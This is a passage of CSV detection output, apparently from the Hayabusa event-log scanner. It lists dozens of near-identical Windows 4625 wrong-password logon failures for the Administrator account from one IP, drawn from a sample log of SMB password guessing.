NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: An6629wgflzSgqY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iO7JktEihqddmEtv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nG97BFOgKxnZaqi4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SH2D24c6nRGDL4Oe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uiu2yfaM2JQQZoLF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YQx9PG8DtR2tMjvS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OoAWryajKhLD7RyY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PgewSeaVugP1TXss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sPMCPdCAnz4upz8X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:21.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dUbV6xnGeBWE8Dif | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dIJ9mZczFO1GKItV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wW0vxE4o68L70Sra | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: upOn9DzB1yWtntyX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m9uGgocAVReiJWDm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qm9Jf1fles2HOb3g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ev5eTWdf3CskOMuh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QoiMO6sSLOm4fOD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xDjvMsa2IgR9KO7l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SR7gVjxHZDYeK7pJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4jzGAepr7JeNKuuk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H9baxEeRCWjx6Fzr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uy7aTt0B4ErguacA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nvKcLrUXqu2vTKO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PLycXLeAU21pdnXL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SgwjJSKOPnurDWW4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YPDYdxPoQAl8aGMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CX8knunlT6SMpmQw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AAjYbt50leZt3Xve | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3CD0HUCdg4UWOiji | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dkeWmTE1R1rYaYP8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W87qcfSj4qWWUv4k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.830 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WUCyUQgbUqwaLj3J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9nLhDbcvmVBZp4f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.925 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BBWo1zDdjaAeGDWW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vjHRFk2flmzzd1zg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 53HYxs9s7fpP1y6V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.035 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tluqXKvVooP7VNyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 43m0nfi5tiv4TpSB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.107 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qjPyJXl984vViV6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.143 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MomQ8Yt51VsMiO4p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.175 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LJYCi5r2otMHxA8f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.211 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4oUSkMBI8SGDLwYC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.251 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j1x3lyRjxn73KITB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.283 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gh05BhGpwq1ho62a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.324 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bxj6ITbiciyRNLbF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uev2mjCaqHjm6NYi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.415 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L4WU383o9E5JyM5V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.450 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lfMv0lsoiRnTCFXe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XL4ahBqUyGeTONkE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8hJ888Kmyi6KqIPn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VZ6sfYMHuygnMdY2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XkuSlyTNc5OOoUtd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Z13YmupcMato8Sd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JedeMnLPnRJEwhZ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.810 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmy0c0wFheIRzSo4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sskKdqku5S0f1sWm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.962 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 15Qg0nCXNj7Ub1Sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZD6iuaqv70k69G87 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gk3UuqTJmvH1snmN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zaw9iF5mJlyygdnB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Sr5PZAd1qMc7hi3c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l5xbQtyueVq3fJSG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.203 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g2nP0zz2ofBxTGw6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SYJheREJmEwj0791 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: exglD9fnLwaqwRZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.325 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8bSAU1QjasDAsmry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cfnrtXR7evQBbaOw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.410 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KYAwjW99chcntPsQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rG2PYfOTfT7QvbPu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FojDtfDNXq0gQfYu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SUTT0QycbFtyJfNL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gcbv1lrcYdT9Wuli | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pjdFfvCCfGXo7FUf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rzqGdWlGglLQx6Z4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3Rt80PMk70sVqbk | IP Addr: 192.168.198.149 | AuthPackage: 